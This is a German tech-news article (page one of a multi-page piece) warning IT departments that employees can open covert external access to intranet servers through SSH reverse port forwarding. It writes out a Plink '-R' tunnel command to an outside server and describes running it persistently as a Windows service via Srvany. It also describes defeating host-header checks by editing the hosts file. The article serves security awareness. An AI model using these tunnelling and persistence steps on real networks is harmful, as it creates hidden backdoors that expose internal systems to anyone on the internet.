Gefahr durch SSH: Portforwarding außer Kontrolle

Im Unternehmen
reicht ein Arbeitsplatzrechner mit SSH-Client, um in Kombination mit einem
externen SSH-Server einen Zugang von außen zu schaffen. Ein potenzieller
Eindringling ist also auf Hilfe von innen angewiesen.

Häufig handelt es sich gar nicht um illoyale Mitarbeiter. Vielmehr wird
mittels SSH ein Fernzugang zum Unternehmensnetzwerk geschaffen.
Besonders betroffen sind Unternehmen mit sehr hohem
Sicherheitsbewusstsein.

Je mehr Unbequemlichkeiten der Mitarbeiter beim
Fernzugang zu überwinden hat, zum Beispiel

Smartcard
oder
RSA-Token, desto höher ist seine
Motivation, selber einen einfacheren Zugang zu schaffen. Besitzt er
bereits einen Multiplayer-Game-Server im Internet und weiß um die
Nichtentdeckbarkeit seiner "Zugangslösung", ist die Hemmschwelle gering.

Oft liegt es auch einfach daran, dass der offizielle Zugang auf dem
heimischen Rechner nicht funktioniert, weil es sich dabei um einen
Macintosh handelt. Vielfach ist auch der offizielle Zugang
nicht zuverlässig verfügbar.

Auf einem Windows-Arbeitsplatz-PC eignet sich der SSH-Client

Putty
, um mittels Portforwarding einen unbemerkten Zugang zu
schaffen. Er besteht nur aus EXE-Dateien, die nicht installiert werden
müssen und sofort aus jedem Verzeichnis ausgeführt werden können.

Administratorrechte sind auf dem Rechner im Unternehmen nicht nötig.
Hier wäre ein Eingreifen der
Vista-Benutzerkontensteuerung angebracht. Doch an einem SSH-Client
kann sie nichts Verdächtiges entdecken.



Bild 2: Mit Plink wird der angemietete Server zur unbemerkten Hintertür
für jedermann.

Besonders geeignet ist das Programm Plink aus der Putty-Suite, da es es sich um eine
rein textbasierte Implementierung eines SSH-Clients handelt. Mit dem
Befehl "Plink -v -T -R 80:10.10.10.10:80
root@Server.Hoster.Example.com
" wird der angemietete Rechner
Server.Hoster.Example.com angewiesen, einen SSH-Tunnel vom
HTTP-Port 80 auf den Intranet-Webserver 10.10.10.10 bereitzustellen.

Dies ist in vielen Unternehmen ein normaler Vorgang, um einen Webserver
offiziell im Internet bereitzustellen, der physikalisch im Intranet
steht. Die Kontrolle über den SSH-Server mit der Internet-IP-Adresse hat
in diesem Fall die IT-Abteilung.

Ein
Angreifer verfügt jedoch über eigenen SSH-Server.
In obigem Beispiel kann ein beliebiger Internet-Anwender in seinem Browser http://Server.Hoster.Example.com
eingeben und landet auf dem Firmen-Intranet-Server.

Anstelle der IP-Adresse des Intranet-Servers lässt sich auch der DNS-Name
verwenden. Es können mehrere -R-Anweisungen in einer Befehlszeile
angegeben werden, um eine Vielzahl von Webservern und anderen Diensten,
etwa Remote-Desktop- oder File- und Print-Dienste, ungeschützt ins
Internet zu leiten.

Weitere Schützenhilfe liefert zum Beispiel ein Tool wie
Srvany aus den
Windows 2003 Resource Kit Tools. Damit kann Plink als Dienst installiert
werden, der bei jedem Hochfahren des Arbeitsplatzrechners startet. Ein
lokales Anmelden ist nicht erforderlich. Das Password für den SSH-Server
im Internet kann mittels der Plink-Option "-pw <Password>"
angegeben werden.

Einen Intranet-Server, der vermeintlich durch Auswertung des
Host-Headers geschützt ist, kann ein Angreifer leicht durch
Modifizieren der eigenen
Hosts-Datei
austricksen.

Die Verwendung von Techniken, die vom Design her nicht als
Sicherheitstechnologie gedacht sind, ist generell keine gute Idee. Ein
Intranet-Server,

der per SSL sicherer gemacht wurde
, kann damit ohnehin nicht
geschützt werden.

Page: 1 2 3 4 5

ZDNet.de Redaktion

Recent Posts

Wie ein Unternehmen, das Sie noch nicht kennen, eine Revolution in der Cloud-Speicherung anführt

Cubbit ist das weltweit erste Unternehmen, das Cloud-Objektspeicher anbietet. Es wurde 2016 gegründet und bedient…

3 Tagen ago

Dirty Stream: Microsoft entdeckt neuartige Angriffe auf Android-Apps

Unbefugte können Schadcode einschleusen und ausführen. Auslöser ist eine fehlerhafte Implementierung einer Android-Funktion.

4 Tagen ago

Apple meldet Umsatz- und Gewinnrückgang im zweiten Fiskalquartal

iPhones und iPads belasten das Ergebnis. Außerdem schwächelt Apple im gesamten asiatischen Raum inklusive China…

4 Tagen ago

MadMxShell: Hacker verbreiten neue Backdoor per Malvertising

Die Anzeigen richten sich an IT-Teams und Administratoren. Ziel ist der Zugriff auf IT-Systeme.

4 Tagen ago

April-Patches für Windows legen VPN-Verbindungen lahm

Betroffen sind Windows 10 und Windows 11. Laut Microsoft treten unter Umständen VPN-Verbindungsfehler auf. Eine…

4 Tagen ago

AMD steigert Umsatz und Gewinn im ersten Quartal

Server-CPUs und Server-GPUs legen deutlich zu. Das Gaming-Segment schwächelt indes.

5 Tagen ago